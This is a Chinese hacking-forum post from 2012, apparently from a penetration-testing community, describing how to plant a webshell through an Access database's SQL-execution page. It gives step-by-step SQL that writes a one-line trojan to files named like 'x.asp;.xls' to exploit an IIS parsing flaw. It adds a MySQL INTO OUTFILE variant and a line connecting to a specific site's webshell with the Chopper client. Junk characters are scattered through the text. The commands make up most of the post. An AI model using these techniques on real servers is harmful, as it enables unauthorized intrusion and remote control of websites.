中国网络渗透测试联盟

标题: ACCESS执行SQL命令导出一句话SHELL [打印本页]
作者: admin    时间: 2012-9-13 17:53
标题: ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。" O2 V$ s5 P$ H0 m/ ?
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
9 B" N# E& \+ ~  {0 ]# o文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
9 }$ k, T) l* U4 P; s然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
1 x7 n) @& Q& L1.create table cmd (a varchar(50))! z6 s4 c0 X/ e( a( W6 a
2.insert into cmd (a) values (‘‘)- S2 ?7 {+ Z1 M9 Q, L( v/ p
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
, M- m" N. q/ v- c) g5 a! Y(把表cmd的内容导出为物理路径的一个EXCEL文件)2 R1 h0 f% d/ \5 q2 x
4.drop table cmd1 |' N9 J, W# _2 r' }) ~
利用IIS的BUG成功拿到了WEBSHELL。# p% h& `) r7 I- U8 c/ T; t

7 n, p" Z2 H( G/ U( X$ `  e直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
6 u+ n- d9 H0 x  J% @0 G# p) s
4 G1 ?" h4 D5 D% D* I  SQL语句意思解释:( N4 f0 q8 |0 a' A- t# o
  第一句
/ V  M* E/ N+ p# [, C! H  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50$ R" Q; ]8 d# y0 x
* A0 R3 P' m2 @( L2 A
  第二句
! g& q7 I) L) o, @6 i  在表cmd的a字段插入一句话木马3 j% g7 k  B' x
  第三句
& _" j: D) B/ r  @+ _  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件7 Y7 ?4 ~  [) G- F7 E
! Y8 K  u6 X2 k$ @' U
  第四句
; @- {6 V# o+ X  删除建立的cmd表
5 j7 _( P" O1 ?; A0 B9 v  K6 B$ b6 u3 t; \8 D
  以下内容为测试:
7 r, ^" L; O' }( ?  Access利用后台SQL执行命令功能导出WebShell:. U7 G+ T7 f+ z9 N3 W+ v
  这个更简单:
) Q" t0 R5 y5 z( Q3 P  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
  Y2 `+ {# R8 @6 A  或者* d8 G* H( q4 N9 G3 R# ~
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]- ?( `1 M1 U. L' e4 A  k
0 h& d  B  t4 s, p8 A* u
  后台有执行SQL语句功能(vote为已知表段)
4 I3 a% x: j+ L" I  希望对大家有所帮助拿shell的又一个思路! [+ y' ?  e9 i" I' Z2 |! T0 z5 s/ N




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2